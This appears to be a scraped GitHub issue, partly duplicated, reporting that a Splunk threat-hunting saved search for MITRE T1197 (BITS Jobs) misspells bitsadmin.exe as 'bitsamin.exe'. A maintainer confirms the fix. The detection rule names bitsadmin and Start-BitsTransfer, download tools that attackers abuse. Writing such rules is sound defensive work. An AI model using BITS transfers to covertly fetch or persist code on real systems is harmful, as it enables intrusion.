Closed brianyaucy closed 5 years ago
There is a typo in the saved search [T1197] BITS Jobs - Process: bitsamin.exe
To correct, in default/savedsearches.conf, find [[T1197] BITS Jobs - Process] action.email.useNSSubject = 1 action.summary_index = 1 action.summary_index._name = threathunting action.summary_index.mitre_category = Persistence,Defense_Evasion action.summary_index.mitre_technique = BITS Jobs action.summary_index.mitre_technique_id = T1197 alert.track = 0 cron_schedule = */15 * * * * dispatch.earliest_time = -15m@m dispatch.latest_time = now enableSched = 1 schedule_window = auto request.ui_dispatch_app = ThreatHunting request.ui_dispatch_view = search search =indextime((sysmonevent_id=1) OR (windows-securityevent_id=4688)) (process_name="bitsamin.exe" OR process_command_line="*Start-BitsTransfer*") \ | eval mitre_technique_id="T1197" \ | eval hash_sha256= lower(hash_sha256)\ |process_create_whitelist\ | eval indextime = _indextime | convert ctime(indextime) | table _time indextime event_description hash_sha256 host_fqdn user_name process_path process_guid process_parent_path process_id process_parent_id process_command_line process_parent_command_line process_parent_guid
[[T1197] BITS Jobs - Process] action.email.useNSSubject = 1 action.summary_index = 1 action.summary_index._name = threathunting action.summary_index.mitre_category = Persistence,Defense_Evasion action.summary_index.mitre_technique = BITS Jobs action.summary_index.mitre_technique_id = T1197 alert.track = 0 cron_schedule = */15 * * * * dispatch.earliest_time = -15m@m dispatch.latest_time = now enableSched = 1 schedule_window = auto request.ui_dispatch_app = ThreatHunting request.ui_dispatch_view = search search =
((
event_id=1) OR (
event_id=4688)) (process_name="bitsamin.exe" OR process_command_line="*Start-BitsTransfer*") \ | eval mitre_technique_id="T1197" \ | eval hash_sha256= lower(hash_sha256)\ |
\ | eval indextime = _indextime | convert ctime(indextime) | table _time indextime event_description hash_sha256 host_fqdn user_name process_path process_guid process_parent_path process_id process_parent_id process_command_line process_parent_command_line process_parent_guid
To correct, change bitsamin.exe to bitsadmin.exe in search.
bitsamin.exe
bitsadmin.exe
thanks! this has been addressed in the next push
There is a typo in the saved search [T1197] BITS Jobs - Process: bitsamin.exe
To correct, in default/savedsearches.conf, find
[[T1197] BITS Jobs - Process] action.email.useNSSubject = 1 action.summary_index = 1 action.summary_index._name = threathunting action.summary_index.mitre_category = Persistence,Defense_Evasion action.summary_index.mitre_technique = BITS Jobs action.summary_index.mitre_technique_id = T1197 alert.track = 0 cron_schedule = */15 * * * * dispatch.earliest_time = -15m@m dispatch.latest_time = now enableSched = 1 schedule_window = auto request.ui_dispatch_app = ThreatHunting request.ui_dispatch_view = search search =
indextime((
sysmonevent_id=1) OR (
windows-securityevent_id=4688)) (process_name="bitsamin.exe" OR process_command_line="*Start-BitsTransfer*") \ | eval mitre_technique_id="T1197" \ | eval hash_sha256= lower(hash_sha256)\ |
process_create_whitelist\ | eval indextime = _indextime | convert ctime(indextime) | table _time indextime event_description hash_sha256 host_fqdn user_name process_path process_guid process_parent_path process_id process_parent_id process_command_line process_parent_command_line process_parent_guid
To correct, change
bitsamin.exe
tobitsadmin.exe
in search.